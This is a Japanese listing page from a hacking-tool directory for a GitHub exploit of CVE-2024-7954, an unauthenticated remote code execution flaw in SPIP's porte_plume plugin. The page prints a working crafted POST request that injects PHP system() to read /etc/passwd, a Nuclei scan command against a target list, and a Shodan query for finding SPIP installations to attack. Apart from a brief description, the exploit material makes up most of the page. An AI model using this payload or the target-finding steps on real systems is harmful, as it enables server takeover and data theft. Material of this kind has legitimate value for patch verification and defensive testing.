Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
RCE-CVE-2024-7954 — CVE-2024-7954 のエクスプロイト: SPIP の porte_plume プラグインにおけるリモートコード実行。Nuclei スキャンテンプレートと Shodan dork を含み、脆弱なインスタンスを特定します。 | Kitploit
ツール/GitHubGitHub/arthikw3b/rce-cve-2024-7954
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

CVE-2024-7954 のエクスプロイト: SPIP の porte_plume プラグインにおけるリモートコード実行。Nuclei スキャンテンプレートと Shodan dork を含み、脆弱なインスタンスを特定します。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RCE-CVE-2024-7954

説明

SPIPのバージョン4.30-alpha2、4.2.13、4.1.16より前のバージョンで使用されているporte_plumeプラグインは、重大な**任意のコード実行(RCE)**脆弱性の影響を受けます。この欠陥により、リモートの認証されていない攻撃者が特定のHTTPリクエストを作成することで、SPIPユーザーとして任意のPHPコードを実行できるようになります。悪用される可能性は深刻で、攻撃者がサーバー上で悪意のあるコマンドを実行できるため、不正アクセス、データ漏洩、またはさらなるシステム侵害につながる可能性があります。

脆弱性の詳細

  • 影響を受けるソフトウェア: SPIP(バージョン4.30-alpha2、4.2.13、4.1.16より前)
  • 脆弱性の種類: リモートコード実行(RCE)
  • 重大度: 重大
  • 悪用可能性: リモートの認証されていない攻撃者がこの脆弱性を悪用できます。

エクスプロイト

##Nuclei Scan

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





この脆弱性を悪用するために使用できる、細工されたHTTPリクエストの例は次のとおりです。

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

エクスプロイトの説明:

  • POSTリクエストはSPIPのindex.phpファイルのporte_plume_previsuアクションに送信されます。
  • dataパラメータには、PHPのsystem()関数を利用してコマンドを実行するペイロードが含まれています(この場合、cat /etc/passwdはパスワードファイルの内容を読み取ります)。
  • 攻撃者はsystem()関数内のコマンドを変更することで、サーバー上で任意のPHPコードを実行でき、深刻な結果を招く可能性があります。

Shodan Dork

潜在的に脆弱なSPIPインストールを特定するには、次のShodan検索クエリを使用できます。

root@kitploit:~
app="SPIP"

この脆弱性は、ソフトウェアを最新の状態に保ち、悪用から保護するための堅牢なセキュリティ対策を実装することの重要性を強調しています。

ツールをダウンロード